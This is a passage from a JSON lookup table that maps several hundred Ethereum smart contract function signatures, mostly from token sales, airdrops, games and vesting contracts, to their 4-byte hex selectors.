"0x34af370f", "DQCoin()": "0x3cd35429", "Vanadium()": "0x61c5623d", "Honolulu()": "0xe76e337d", "Livetest()": "0xcdb0fed9", "getAmountRaised()": "0x6d1af018", "getAmountAccredited(address)": "0x9a4d19f8", "setupAccreditedAddress(address,uint256)": "0xf2eea5c1", "EarlyTokenSale(address,address)": "0x20bcbee5", "createMintableSale(uint256,uint256,uint256)": "0x69fa2cae", "setupMintableAddress(address)": "0x8d734b30", "rewardKoth()": "0xb6f687a2", "resetKoth()": "0xf138fca5", "koth_v1b()": "0xdbecfb25", "EOMarketToken()": "0x9695e3c0", "EBRK()": "0x648fd473", "TonhaoCoin()": "0x829efd71", "ReichaCOIN()": "0xadf2ef99", "DoremiXToken()": "0x04937cf9", "TIGER()": "0xf8bb9160", "AAP()": "0xd3bf0ce6", "SLABSToken()": "0xd933b5f2", "claimedOf(address)": "0xbaa3f7ee", "saleBalanceOf(address)": "0x7d1710e4", "AhooleeTokenSale(uint256,uint256,uint256,address,address,uint256,uint256,uint256)": "0x555ab116", "CryptoHuntersToken()": "0x02140adf", "THO()": "0x89bc455d", "LFSTYLToken()": "0xd1ae9607", "_0xLitecoinToken()": "0x6e5406e3", "CoinCool()": "0x670c1500", "way()": "0x5d6542af", "par()": "0x495d32cb", "Scicoins()": "0x08c01e5b", "HyperChipsToken()": "0xdd8f3195", "WWWToken()": "0xa10ef122", "IjasCoin()": "0x2f781228", "HAUZ()": "0x21ec0129", "getUnitInfo(uint256,uint256,uint256)": "0x06011b14", "numLots()": "0xfab18075", "activityClosed()": "0x73d901d6", "pid()": "0xf1068454", "specialWallet()": "0xe6d17238", "stillAllowed()": "0x6c9eafe7", "timeTier2()": "0xd2bb6fd5", "MINIMUM_PARTICIPATION_AMOUNT()": "0x2e87edd9", "ADVISER_STAKE()": "0x26529836", "initVault()": "0x7c65f503", "isBountySent()": "0x4b90ac86", "vipBrokerFee()": "0xbbcac1c3", "founderAndTeamSent()": "0xf3181001", "startTimeSaleNoBonus()": "0xd2df9cc1", "press_address()": "0x85265ee6", "isIcoActive()": "0x1fc27ef2", "ecoBuilder()": "0xb1d9647e", "fundingMaxInWei()": "0xe799f374", "getSevenCount()": "0xd4335bd2", "TOKENS_PER_KETHER()": "0xf527c856", "goldUnFreeze()": "0x3e175c0b", "addDrop()": "0x29e614ee", "futureDevelopmentPoolAddress()": "0xed3788c9", "MIN_BID_FRAC_TOP()": "0x31fc5b18", "haltFX()": "0x592b5d17", "teamLock()": "0xba72cc36", "window3TotalSupply()": "0x075e0a7c", "PRICE_RATE_SECOND()": "0x773ef38e", "tokensCap()": "0x085ceb30", "distributorCount()": "0x3ac140e8", "PauseTokenContract()": "0x4f968868", "creditFundNIMFAAddress()": "0x2ed4b68a", "leftOnLastMint()": "0x36b40bb6", "preSaleBfPlatform()": "0xd73ff0db", "getActiveShareholdersArray()": "0x8007acbf", "ledgerContract()": "0x026345b6", "numDefinedGames()": "0x4a5163b5", "releaseState2()": "0x1030f288", "sellDividendPercentEth()": "0xe5a07419", "goldenTicketOwner()": "0x0c547097", "firstRoundWMDiscount()": "0xcdd90fbb", "minGoal()": "0xd48675f3", "isSecondStageFinalized()": "0xcce2270a", "raisedSale2USD()": "0x0b60ca88", "divForSellBack()": "0x7138e0c9", "ddf()": "0xdad99119", "__address1__()": "0xd8ec696f", "lastRewardAmount()": "0xbafedcaa", "directorJurisdication()": "0x4207d648", "initialBonus()": "0xfb0d7e43", "maxSellable()": "0x313354dc", "availableICO()": "0x641ca23f", "prospectors_dev_allocation()": "0x4a91ec80", "creditStatus()": "0x9d4c7737", "pathAdvisorVault()": "0x489c14fd", "isDeploying()": "0xf6444bcc", "startRelease()": "0x6c56a3f1", "getTokensTotal()": "0x5dc94af6", "evenDistThresh()": "0xf2a6e605", "Monthprofitstart()": "0x39181e6c", "artUrlList()": "0xc6c25d04", "foundersWallet1()": "0x5af1cf27", "recentPlayersBack()": "0xb1ecb343", "isDonatedEthTransferred()": "0x70228400", "ico_PRICE()": "0x59a02589", "option30symbol()": "0x45b426f2", "CROWDSALE_DURATION()": "0xad3c0b9d", "totalRestrictedTokens()": "0x2fe20e94", "BONUS_WINDOW_4_END_TIME()": "0x72e2cac8", "manufacturer()": "0x74754282", "nextAssetId()": "0x8ed91318", "secondPeriodOfICO()": "0xbacf3f65", "polls()": "0xe64853c4", "dteamVaultAddr2()": "0x60a4d104", "UNFREEZE_DATE()": "0x4f271740", "creatorsTotalBalance()": "0xb925af47", "totalDonations()": "0xde2ed893", "firstPreSaleEndDate1()": "0x1c3bc31f", "teamHolder()": "0x4b66cb7e", "usdraised()": "0x91214841", "ETHER_THRESHOLD()": "0x66c313c6", "fairsaleProtectionOFF()": "0x19adda2c", "softcapInTokens()": "0x1938a238", "multiSigWalletAddress()": "0x6d1f451b", "getAllGames()": "0xdb1c45f9", "advancedThreshold()": "0x79c0f30e", "maxBonus()": "0x54c5b696", "saleHasEnded()": "0x733e193c", "MAX_TIME_EXPLORE()": "0x0be21ea9", "claimPlayerProfit()": "0xdd9815a2", "START_TIME()": "0xddaa26ad", "levToken()": "0xc819f6e9", "groveAddress()": "0xe760fb06", "getStageandPrice()": "0xacb9d6f6", "tokenLimitPerWallet()": "0xbd218493", "affWallet()": "0xab6ae424", "ethForMilestone()": "0xad57ceb4", "incentivisationAllocation()": "0xa833c7ab", "presaleendTime()": "0x164745c5", "parnter()": "0x47430b36", "snapshotTimestamp()": "0x9c43eb54", "CrowdTmoney5()": "0x465f1d07", "batchTransferForDifferentValues(address[],uint256[])": "0x173c9d27", "batchTransferForSingleValue(address[],uint256)": "0x9ab567ba", "HanlinTestToken(string,string)": "0xa52cf5a4", "setPrePresaleTokens(uint256)": "0x6b3e8ca0", "lockState(string)": "0x3be746b6", "getTokenIdFrombBPhash(string)": "0xc53c2556", "makerOf(uint256)": "0xc4f06ba9", "burn(address,uint256,address)": "0xb8ce670d", "getTokenId()": "0x010a38f5", "getCRaddress()": "0x0c27677a", "getWHaddress()": "0x0fadb5c7", "getBPaddress()": "0x1bd5363c", "getCRhashOfCRTokenId(address,uint256)": "0xf77b6f61", "getTokenIdOfCR(string)": "0xe698816f", "haveShelf(string)": "0xf7fc8a91", "setTokenId(uint256)": "0xc929ccf3", "unshelf(string)": "0x0ec52541", "canUnshelf(string)": "0x5aec11d4", "shelf(string,address)": "0xe6c9f6ee", "canShelf(string,address)": "0x4901a205", "setCRaddress(address)": "0xd4ed0b46", "setWHaddress(address)": "0x7c85df24", "setBPAddress(address)": "0xd39b7e4f", "internet()": "0x0ec12782", "updateBaseTokenURI(string)": "0x655391c9", "supportedTokens(uint256,uint256)": "0xf6b6daf1", "getVendorByAddress(address)": "0x43defc10", "getVendorIds(uint256,uint256)": "0x4657d848", "makeVendorValid(uint256,bool)": "0xb3d4e3f2", "removeVendorById(uint256)": "0x1738c3ff", "removeVendorByAddress(address)": "0x408aee81", "addVendor(address,string)": "0x1898a1c7", "airdrop_byadmin(address,uint256)": "0x0d472f5f", "PolyDistribution(uint256)": "0x3c0b9db2", "DEMO()": "0xc28cedf3", "setURI(uint256,string)": "0x862440e2", "mint(string,uint256,string,uint8,string)": "0x13d8867c", "burnTokensExp(uint256,uint256)": "0xf3332d1c", "triggerEvent(string)": "0xe6c75c6b", "dequeue(bytes32)": "0x5e48ce0f", "timeWaitApply4Redeem(address)": "0xfc235fb8", "timeWaitUnlock(address)": "0xaa125d08", "factorReward()": "0x486d6aa8", "dividendForHistory()": "0x25d8f6a5", "dividendForYearly()": "0x848a0327", "dividendFor10kDaily()": "0x73fb7878", "dividendFor(uint32)": "0xb3c199c1", "drawWinner()": "0xb2185bb1", "CrankysLottery()": "0x59a131e2", "claim(address,address,uint256)": "0x996cba68", "pay(address,address,uint256,uint256)": "0xdd9a76ff", "HuuumanStandardToken(uint256,string,uint8,string)": "0xd9de1e98", "SingularityTest14()": "0x9383d4e6", "addToken(bytes32,address)": "0x9776aacf", "transferICOFundingToWallet(uint256)": "0x51922341", "habichnet()": "0x7aeb0763", "SetApplicant(string,string,string,int256,string)": "0xdfe699b1", "createRandomNumber(uint256)": "0xacefd330", "_generateRandomhashNumber(uint256)": "0x16a558d0", "_createNumber(uint256,uint256)": "0x190151c6", "resetHasAutoVote()": "0xda280fe5", "DolToken()": "0x5d3458ea", "totalSupplyEdition(uint256)": "0xb6f4df34", "totalAvailableEdition(uint256)": "0x6a028692", "totalRemaining(uint256)": "0xbc02844c", "editionActive(uint256)": "0xbbd1e1fc", "tokenURIEdition(uint256)": "0x385df389", "priceInWeiEdition(uint256)": "0x43bf63e8", "artistCommission(uint256)": "0x32fd8478", "purchaseDatesEdition(uint256)": "0x652edd41", "editionType(uint256)": "0x593af56a", "editionData(uint256)": "0x213d6771", "priceInWeiToken(uint256)": "0x15347380", "purchaseDatesToken(uint256)": "0xb8f6c219", "tokenURISafe(uint256)": "0xfee7e35d", "tokenData(uint256)": "0xb4b5b48f", "detailsOfEdition(uint256)": "0x71c847b2", "editionOptionalCommission(uint256)": "0xde56a245", "editionExists(uint256)": "0xc2b2fb5e", "tokensOfEdition(uint256)": "0x7a85c02a", "artistsEditions(address)": "0x6641179e", "editionsOfType(uint256)": "0xe7b8d977", "editionOfTokenId(uint256)": "0x824eec3b", "updateOptionalCommission(uint256,uint256,address)": "0x97e851f6", "updateEndDate(uint256,uint256)": "0xe6232ba1", "updateStartDate(uint256,uint256)": "0x328a2c2d", "updateTotalAvailable(uint256,uint256)": "0xbdcdc0bc", "updateTotalSupply(uint256,uint256)": "0xf8b4ab7a", "updateActive(uint256,bool)": "0x04bb1e3d", "updateEditionType(uint256,uint256)": "0xd4f3d6b8", "updateArtistsAccount(uint256,address)": "0xafa7a25f", "updateArtistCommission(uint256,uint256)": "0x5091f881", "updatePriceInWei(uint256,uint256)": "0x7eb9f04a", "updateEditionTokenURI(uint256,string)": "0x75dcb70a", "updateKoCommissionAccount(address)": "0x187d8803", "batchTransferFrom(address,address,uint256[])": "0xf3993d11", "batchTransfer(address,uint256[])": "0xac3c9952", "_handleFunds(uint256,uint256,address,uint256)": "0xe566dfc6", "_mintToken(address,uint256,uint256,string)": "0xd47380e0", "buyTreeTokens(address,uint256)": "0x5439e185", "initializeTreeCoinProject(address,uint256,uint256,address,address)": "0xc7adb61f", "TreeCoin()": "0x91fc7c70", "getLastInput()": "0xa6d958c6", "setInputs(string,string,string)": "0x5987f859", "ZhangToken()": "0x09d11c1d", "YBQ()": "0xa93e2b49", "SODIUMTOKEN()": "0xbb25fd7f", "showPoolInfo(uint256)": "0x60521116", "showDepositEther()": "0xb39dcb1d", "showInvestEther(uint256)": "0x2bc4aa1a", "CCXTokenERC20()": "0x586dd1d5", "RISHABHToken(address,address)": "0xaccb4219", "steemh()": "0xa5cd3fd0", "DataSellToken()": "0x4d3e7682", "IrfanFr()": "0x0aa5418f", "pauseRefund(bool)": "0xcec4a1cc", "Quhabitat()": "0x0b682cb8", "updateTierMinimum(uint256,uint256)": "0xca276c07", "MIN_UPDATE(bytes32,uint256)": "0x57ad693b", "Test68()": "0xbd4c0755", "getWalletUser(uint152)": "0x4bed81c8", "votePassed(uint256)": "0xcb6b25f3", "tallyVotes(uint256)": "0x4d318b0e", "setVeto(uint256,bool)": "0x92ba77ca", "setVoteInternal(uint256,uint160,bool,bool)": "0x88a8b341", "setManagedVote(uint256,uint152,bool)": "0xd73a2901", "setVote(uint256,bool)": "0xd3516b7e", "getUserVote(uint256,uint160,bool)": "0xdde8c8d6", "addManagedInvestmentProposal(uint32,bytes24,uint256,uint152)": "0x0578f356", "addInvestmentProposal(uint32,bytes24,uint256)": "0x18c5e3af", "getInvestmentProposal(uint256)": "0x38b5491b", "getAllocationProposal(uint256)": "0x3f7f8b24", "Assembly(address)": "0x355e56b9", "deposit(address,uint152)": "0x33007cdf", "withdraw(uint152,address,uint256)": "0xd9823996", "purchase(uint152,uint256)": "0x83b665b9", "transfer(uint152,uint152,uint256)": "0x2a305613", "balanceOf(uint152)": "0x5ce94328", "MinutemanToken()": "0x09310c61", "setWhitelisted(address,bool)": "0x9281aa0b", "setExchangeRate(uint32)": "0x1fde8469", "setPrice(uint8)": "0xbe1271c4", "StablePrice(uint8)": "0xe17682eb", "account(string)": "0xf1bba6f9", "setXto2()": "0x67aa863f", "dexTestNormalTransfer(address,address,uint256)": "0xa3a9196a", "dexTestApprove(address,address,uint256)": "0xd99fe20d", "dexTestTransferFrom(address,address,address,uint256)": "0x74c40f2e", "dexTestTransfer(address,address,uint256)": "0xa6ea7ad2", "asmApprove(address,address,uint256)": "0x0317fb71", "asmTransferFrom(address,address,address,uint256)": "0x3daad222", "asmTransfer(address,address,uint256)": "0xfd9923ce", "handleReturnData()": "0x43039433", "FudgeCucks()": "0x0d7eaa8b", "registerPubKey(address,bytes)": "0xd87adaa0", "isValidPubKey(bytes)": "0xf0075829", "pubKeyToAddress(bytes)": "0x70ae992a", "N2Contract()": "0xd45769b8", "ReleaseableToken(uint256,uint256,uint256)": "0x49d800a1", "initializeMintableTokenFundraiser(string,string,uint8)": "0x366df51d", "executeTransfer(address,address,uint256)": "0xe58ef8a8", "setIndividualMaxCap(uint256)": "0x6007c836", "setIndividualMinCap(uint256)": "0xdaae717c", "BitChordCrowdsale(address)": "0x0996b4cc", "initializeIndividualCapsFundraiser(uint256,uint256)": "0xaaead0f0", "changeGasPriceLimit(uint256)": "0x65c13fdb", "initializeGasPriceLimitFundraiser(uint256)": "0xf2181e23", "initializeCappedFundraiser(uint256)": "0xe399cb0d", "initializeBasicFundraiser(uint256,uint256,uint256,address)": "0x937fd355", "handleFunds(address,address,uint256)": "0xa841f1eb", "handleTokens(address,address,uint256)": "0x5f27f946", "validateTransaction()": "0x5e280e4e", "receiveFunds(address,address,uint256)": "0xb9df819f", "getConversionRate()": "0xf36089ec", "initializeFundraiserToken(address)": "0x30ad12a6", "toEthSignedMessageHashBytes(bytes)": "0xca9ec138", "fromBytesToBytes32(bytes)": "0xb694dbb5", "getRequestHash(bytes,bytes,uint256)": "0xba723fe2", "checkRequestSignature(bytes,bytes,uint256,bytes)": "0xe8cb635b", "acceptAndAdditionals(bytes32,uint256[])": "0x87902997", "LottixTest()": "0x96ca7653", "createAcceptAndAdditionalsFromBytes(bytes,bytes,bytes,uint256[])": "0xccccc36b", "extractAndStoreBitcoinAddresses(bytes32,uint256,bytes,bytes)": "0xa7030a53", "createRequestAsPayeeAction(address[],bytes,int256[],address,bytes,string)": "0x4ecd4aa9", "RequestBitcoinNodesValidation(address,address)": "0x2387e75e", "VIRTVEN()": "0x58062e66", "SpiceNinja()": "0xddb49f98", "CryptDash()": "0x2329b4f7", "isClient(address,address)": "0x7e61c768", "Boldman()": "0x0cd6ceb3", "BabyDragon()": "0xd7bfc8c5", "Lexzoom()": "0x8532137c", "random(uint8,uint256)": "0x087ee4c6", "draw_random_card(uint8,uint8[])": "0xebe64f97", "AIC()": "0x9c0fc1e4", "contractbalance()": "0x30e4f9aa", "allowanceBalance()": "0x8f776ff1", "releaseEQUIWihtoutKYC()": "0x1fb8c0ed", "NOORToken()": "0xd54c03a9", "_donationSupply()": "0x6248cf49", "oneTokenInUsdWei()": "0xc0a99a83", "executor()": "0xc34c08e5", "setRunning()": "0xb143d6fb", "whitelist_enable()": "0xa7cd674e", "claimedToday()": "0xa9d74013", "etherVault()": "0xbc6548fb", "priceLeRT()": "0xad53be1d", "totalKittiesBurned()": "0xe470ddf8", "goldBoxAmountForSale()": "0xc42cb819", "minCutValue()": "0x2a607962", "xaurCoined()": "0x64e4a8fb", "maxHolderCount()": "0xae89a29e", "dustToEtherPrice()": "0x423dcf29", "bonusRate()": "0x5af123f4", "teamWalletAddress()": "0x1245e347", "TopUpMember()": "0x8994fa53", "TEAM_VESTING_DURATION()": "0xde7c2ed2", "onwerName()": "0x03941cc5", "refundStageStartTime()": "0x49239e10", "VESTED_TOKENS()": "0xdf4e79fa", "COLOR_SILVER()": "0xa1aec173", "crowdSaleTime()": "0x0d80b84b", "vaultWallet()": "0x61f1c5ba", "developmentFunds()": "0xf92a9de5", "formulaContract()": "0x5cc5ca50", "startAuctionFee()": "0x6a100f37", "iMMCoinsellPrice()": "0x5540e6c1", "icoOver1()": "0x2298b9ce", "DIP()": "0x9a6f978d", "sumICOStage4USD()": "0xd3c65737", "numArtworks()": "0x22132598", "ethInWei()": "0x83eeecc0", "firstRoundCosmosStart()": "0x5b1b9316", "lastPrizeGiven()": "0xd49edbd8", "initSupply()": "0x97d63f93", "minsignupeth()": "0x74163ab1", "hmcAddress()": "0x5918f348", "INCREMENT_RATE()": "0x5baef4f3", "player5Timestamp()": "0x0874ba06", "rateB()": "0xfd1fb2fa", "presaleLimit()": "0x525b3fe3", "discountValue5()": "0xf9c935cf", "teamVestingContractAddress()": "0x9fdeeb5e", "crowdSaleBalance()": "0x3a501155", "secondWeekTokenPrice()": "0x8ef85e04", "highestContribution()": "0x9b343525", "potReserve()": "0x56997fb4", "bonusOver30ETH()": "0x39515e3c", "KING_WIN_MULTIPLE_PER()": "0x6ab3c5bd", "gameStartedAt()": "0x4e2a953a", "refundsOpen()": "0x0694d1be", "tier3Timestamp()": "0xbbf14d67", "allScamsForSale()": "0xea49ac03", "requiredAuthorities()": "0xb39c2944", "balanceThreshold()": "0xc3173774", "getRedemptionBalance()": "0x143f68c9", "vcx()": "0xfb7e54eb", "startPrivatesaleDate()": "0x2411ca69", "fundForSale()": "0x916576c8", "maxAmountBonus()": "0xad59ffd1", "delegateUrl()": "0x8e95b28b", "boosters()": "0xf37a7d4d", "VULCAN_POD_MAX_CARGO()": "0x627992c7", "maxNumInterests()": "0x68dd43f6", "castleExpAdjustment()": "0x8a2cb24d", "SALE_MIN_BUY()": "0x8af1c825", "launchOutcome()": "0x3d37542b", "donationsStartTime()": "0xeeb6588a", "transferableUntil()": "0xd9a6cf81", "secondaryOperator()": "0xfd0c78c2", "icoAgent()": "0x830f2935", "hasFourYearWithdraw()": "0xe0453376", "saleRateFirstDay()": "0xf93f7ab5", "tixNumberforSale()": "0x9080c78c", "referrerBonus2()": "0x8cd41fd8", "nextContributorIndexToBeGivenTokens()": "0x71827791", "pricePerUnicorn()": "0xc40940f4", "restricted()": "0x7072c6b1", "getMHTHoldersNumber()": "0xe20e54a5", "linkSelf()": "0x09a14f2e", "forwardUpdateFeesTo()": "0x0d831d09", "unfreezeStartTime()": "0x51eace10", "numBlocksLocked()": "0x4e724f0f", "affiliatesCutOutof100()": "0xfc7ba686", "total_wins_wei()": "0x251a8096", "phase3Price()": "0xb4b2d3d8", "getQueueLength()": "0xb8f77005", "transferFundToAccount()": "0x24f5445b", "EVMSCRIPT_REGISTRY_APP()": "0x9b3fdf4c", "isCrowdsalePaused()": "0x98983cc5", "how()": "0x3a4a4233", "ACTION_INITIAL_BIDDING()": "0xc7a323fe", "charonsBoat()": "0x4717f25a", "totalSupplyICO()": "0xc3b18ff2", "mainFabricAddress()": "0xbb287679", "numFree()": "0x6edbba2e", "startChampionGame()": "0x20e59116", "number_of_token()": "0x6991bad0", "playerNum()": "0x03e28366", "upgradeStorage(address)": "0x82bfa9f2", "upgradeFinance(address)": "0x6b128b2f", "Advertisement(address,address,address)": "0x80908b11", "AppCoins()": "0x937dc72f", "pay(address,address,uint256)": "0xb3d76188", "setAdsContractAddress(address)": "0x6377aaa6", "setAdsStorageAddress(address)": "0x971fff63", "AdvertisementFinance(address)": "0x187f707b", "setCampaignOwnerById(bytes32,address)": "0x42399220", "getCampaignOwnerById(bytes32)": "0x433b77c7", "setCampaignValidById(bytes32,bool)": "0x745944d5", "getCampaignValidById(bytes32)": "0x39384126", "setCampaignEndDateById(bytes32,uint256)": "0x17a2c026", "getCampaignEndDateById(bytes32)": "0xa941ff21", "setCampaignStartDateById(bytes32,uint256)": "0xf86a6334", "getCampaignStartDateById(bytes32)": "0x12e6414e", "setCampaignBudgetById(bytes32,uint256)": "0x965acc73", "getCampaignBudgetById(bytes32)": "0x094fb864", "setCampaignPriceById(bytes32,uint256)": "0x16b4e79c", "getCampaignPriceById(bytes32)": "0xd55bdc5f", "setCampaign(bytes32,uint256,uint256,uint256,uint256,bool,address)": "0xfbac7d1d", "getCampaign(bytes32)": "0xcabe0452", "setAllowedAddresses(address,bool)": "0x89781912", "AdvertisementStorage()": "0x4529cd8a", "convertCountryIndexToBytes(uint256[])": "0xbf303d14", "GoCryptoCoin()": "0x461db9ad", "getTopicAtIndex(uint256)": "0x06130ca6", "updateTopicAssetClass(bytes15,bytes15)": "0xf9d09126", "updateTopicDescription(bytes15,bytes32)": "0x309f955a", "updateTopicAddress(bytes15,address)": "0x1f71f250", "getTopic(bytes15)": "0xb7e6bd34", "deleteTopic(bytes15)": "0x78831239", "insertTopic(bytes15,address,bytes32,bytes15)": "0x9d2be721", "isTopic(bytes15)": "0xae024c40", "shouldAirdrop()": "0x37970dbe", "withdrawWinner()": "0xdd32858e", "buyMicroKeysWithHandle(string,bytes32)": "0x36a6412b", "buyMicroKeys(string)": "0x5330a4c6", "registerHandle(bytes32)": "0x2c0fc8cb", "distributeWinnerPot()": "0xa280ce8f", "isWinner()": "0x1a9b0b7c", "isHandleAvailable(bytes32)": "0x94876995", "getLastKeyTime()": "0x875999e0", "getTotalMicroKeys()": "0x64ffb47b", "getValuePerMicroKey()": "0xff600081", "transferAnyERC20Token(address)": "0x08b27e3e", "transferAllERC20Token(address,uint256)": "0xd9c1ac25", "burnedBalanceOf(address)": "0x91c1e2c1", "getAddressKYCState(address)": "0xf74c67b3", "setAddressKYC(address,bool)": "0xf45ce8d7", "transferVestingMonthlyAmount(address)": "0x705b5c27", "exchangeEurToEth(uint256)": "0x2490be24", "exchangeEthToEur(uint256)": "0x5e7f322b", "getAmountToIssue(uint256)": "0xc3f17ae8", "internalFinishMinting()": "0x21d67daa", "SetNewBlockchainEnabled()": "0x0b58dc38", "BurnTokensAndSetAmountForNewBlockchain(address)": "0xde49bd54", "BurnMyTokensAndSetAmountForNewBlockchain()": "0x8d44c90b", "acceptOwnershipAPI()": "0x039e9e00", "transferAPIOwnership(address)": "0x4978ddcc", "Janders()": "0xb895947a", "withdrawTokensForCloudexchangeTeam(uint256,address[])": "0x55c47867", "updateTokensForCloudexchangeTeam(uint256)": "0x9f31de2e", "debitAmountToRefund()": "0x60721b7c", "CloudexchangeCrowdsale(uint256,address)": "0x68d85d3e", "CloudexchangeCrowdsale(uint256,uint256,uint256,address)": "0x7106cdb6", "CloudexchangeToken(address)": "0x7377a036", "getValues()": "0x19eb4a90", "storeValue(uint256)": "0x7221a26a", "someUnsafeAction(address)": "0x748fa599", "storeAction(address)": "0xe8a62235", "someAction(address)": "0xfba9cea9", "unlockVestedTokens(address)": "0xdc126e63", "transferVester(address)": "0x8ff813fd", "transferUpdater(address)": "0x0fc8a393", "unlockInBatches(address[])": "0x5b40d5dd", "lockInBatches(address[])": "0xb0759c3e", "unlockAddress(address,address)": "0x76d47bf5", "lockAddress(address,address)": "0xa400594d", "transferLocker(address)": "0xaa736f57", "assignInBatches(address[],uint256[])": "0x8eb7ffe8", "mintInBatches(address[],uint256[])": "0x2ba25366", "transferAssigner(address)": "0x737a7698", "getAddressTokenSaleId(address,address)": "0xfaaf027b", "getCurrentTokenSaleId()": "0x969bf358", "isTokenSaleOngoing()": "0x6007c4f8", "tokenSaleEnd()": "0x952d6c22", "tokenSaleStart()": "0x403911a6", "Cr1tikalIsShort()": "0x4e3acafe", "MultiChampion()": "0xcb47a8ce", "TokenD(uint256,string,uint8,string)": "0x3b49f84b", "getMyTokensValue()": "0xc74abe43", "emptyContract()": "0xe3a8b345", "changeDevCut(uint256)": "0x60836aa4", "changeActualTokenValue(uint256)": "0xbd5821f1", "changeTokenCostInEth(uint256)": "0x9bb639a8", "payTokens(uint256)": "0x0535020d", "stockSupply(uint256)": "0xb5fecc30", "stopTge()": "0x03d83c4d", "startTge()": "0x7de06cfc", "getAdsCountByCat(uint256)": "0xb4fc0344", "getAllAdIdsByUser(address)": "0x7f4edd72", "getAdIdByUser(address,uint256)": "0xdcfc3b46", "getAdsCountByUser(address)": "0xfc176c4c", "getAdsCount()": "0xdddbb753", "getCommentIdByAd(uint256,uint256)": "0xde494190", "getAllCommentIdsByAd(uint256)": "0x0e22dc5b", "getCommentsCountByAd(uint256)": "0x5d004e85", "getCommentsCount()": "0xc1c1066b", "getCatsCount()": "0x0464f8d0", "_changeOslikiFoundation(address)": "0x40bd8720", "_changeReward(uint256)": "0x6c76b8f4", "_changeUpPrice(uint256)": "0x98729c37", "upAd(uint256)": "0xc59e5729", "newComment(uint256,string)": "0x09787a2c", "TIACOIN()": "0x17ed31f4", "CioCoinERC20Token(uint256,string,string,uint256)": "0x683e3451", "setTicketPrice(uint256)": "0x15981650", "restartMint()": "0x1a8af7a8", "retrieveRefund()": "0x54ddd5d6", "forceBurnFrom(address,uint256)": "0x6696ca51", "cancelFlight()": "0x09aa69c2", "transferMultiAddressFrom(address,address[],uint256[])": "0x782ec023", "getNumRemainingSeats()": "0x32b4d74c", "transferMultiAddress(address[],uint256[])": "0x79b4a2c7", "lockPostion1Add(uint8,address,uint256,uint256,uint8,uint256,uint8,uint256,uint8,uint256,uint8)": "0xa5b781e1", "setLockPostion1(address,uint256,uint8,uint256,uint8,uint256,uint8,uint256,uint8,uint256,uint8)": "0xc44b0290", "DRCToken()": "0xc528fee7", "MyToken(uint256,uint256,string,string)": "0x315fd022", "checkPosition1(address,address,uint256)": "0xa060ecce", "myWishes()": "0xbff5fccd", "getWeddingData()": "0x4e02107a", "PromToken()": "0x67d15775", "WordCoin()": "0xb1db9c2e", "Criptohubcoin()": "0x48fee60f", "listTeams()": "0x0d1d8d6d", "transferFounders(address,uint256)": "0x24dcd0ef", "listCompetitors()": "0xef7dbc54", "SaintArnouldToken(address,uint256,uint256)": "0xce8e2fd8", "getBalance2()": "0x0a70cae0", "competitorPAY(uint256)": "0x66db2a59", "competitorTeam(uint256)": "0x231d87e1", "competitorExists()": "0x703aca29", "setTeam(uint256,string)": "0x9fedb749", "Finished(uint256)": "0x86954ecc", "LamaToken()": "0xa8c3d246", "setGoalsPlayed(uint256,uint256,uint256,bool)": "0xe3199044", "setAPI(address)": "0xe9b29a9d", "sendSignal(bytes32)": "0x66ca2bc0", "storeData(string)": "0xfb218f5f", "SignalPylon(address)": "0xa2a1521a", "user(bytes32)": "0x0dfb6615", "getTitleAddress(uint256)": "0xa56e7bae", "RICHERC20(uint256,string,string)": "0x146b4955", "votePopularity(bytes32)": "0x6a7b988c", "getIpfsAfterTitle(bytes32)": "0xcb6cec4b", "purchaseIpfsAfterTitle(bytes32)": "0x8e3177e1", "getPublishTime(bytes32)": "0xcd3c3011", "getPublisher(bytes32)": "0x07be02fe", "publish(string,bytes32)": "0xbfaec04e", "airdropMVP(address[],uint256)": "0x3f2cba2b", "MERCULET()": "0x846b68e3", "ViberateCrowdsale()": "0x4b95dcc0", "end_PRIVATESALE()": "0x452030c4", "claimTeamTokens(address,uint256)": "0x826776fa", "resume_PRIVATESALE()": "0xac482bff", "depositAngelInvestmentEth()": "0xde271ee0", "pause_PRIVATESALE()": "0xf8b10464", "pushAngelInvestmentData(address,address,uint256)": "0x0565c3f4", "start_PRIVATESALE()": "0xeb8d3321", "calculateEthToVibe(uint256,uint256)": "0x6deaf623", "KNOWToken()": "0x2850d4e6", "forceTransfer(address,uint256)": "0xffb0885d", "forceConsume(uint256)": "0x9a167613", "consume(uint256)": "0x483f31ab", "EphronIndiaCoinICO(address,address,address)": "0x6b7e4175", "_consume(address,uint256)": "0x7a6c7783", "forceRelease(uint256)": "0xd15392b2", "issue(uint32,uint8,uint256,bool)": "0x63157e2b", "ownedTicketIdList(address)": "0xa3e29360", "_release(uint256)": "0x81f6c7e5", "_addTicket(address,uint32,uint8)": "0x846a284e", "SUCC(uint256,string,uint8,string)": "0x7429d78b", "monarchToken()": "0xfe71be6e", "Jumanji()": "0xdf70f3b5", "ATTPlaceHolder(address,address,address)": "0x48624e44", "callerDel(address,address)": "0x4f996a07", "callerAdd(address,address)": "0x3a1767e5", "returnToken(string,address,uint256)": "0x8337077b", "failCar(string)": "0x0f907ba3", "driveCar(string)": "0x95c2d845", "KyberAirDrop(address)": "0x909ec524", "getOutCar(string,uint256)": "0xe5f6b137", "devoteToCar(string)": "0x6801db98", "VLOGS()": "0xaddad094", "register(string,uint256,uint256,uint256,uint256,address[])": "0x9ab422f3", "getEthBullet(string)": "0xdd7d168a", "getPrivilegeState(string)": "0xd2789aa5", "getCarState(string)": "0xfd203906", "returnToken(address,uint256)": "0x7d24a8a1", "KEACoin(uint256,uint256)": "0xf99ee846", "StartICO(uint256)": "0x87fcd708", "_createOpinion(string,address,uint256)": "0xd4d91bdd", "_initOpinion(uint256,string)": "0xa26e7a6c", "_createOpinionSet()": "0x9af88ebd", "_setPrice(uint256)": "0x0ea412ab", "buyCryptopinions(address)": "0xf2429b1c", "_setCEO(address)": "0x05c091f6", "registerOpinion(uint256,string)": "0xcd5a57cb", "deleteThis(uint256)": "0x5e65db7f", "sponsorOpinion(uint256,uint8,bool)": "0xf02152ab", "hasPriorDuplicate(string,uint256)": "0xb9156830", "hasDuplicate(string)": "0x1e9447f3", "getOpinion(uint256)": "0x4f8dd40a", "createInitialItems()": "0xfd28feb3", "OpinionToken()": "0xafd2d5f6", "setInitAttr(address[],uint256,uint256)": "0x87528d5e", "MultiSigWalletWithDailyLimit()": "0x07342e9f", "contributeInternal(address,uint256,uint256)": "0x86145875", "setDates(uint256,uint256,uint256)": "0x1712c489", "preallocate(address,uint256)": "0x5100602a", "minePhx()": "0x2ca8cbd0", "transferPermissions(address)": "0x685b2d8f", "FINXToken()": "0x30de7e88", 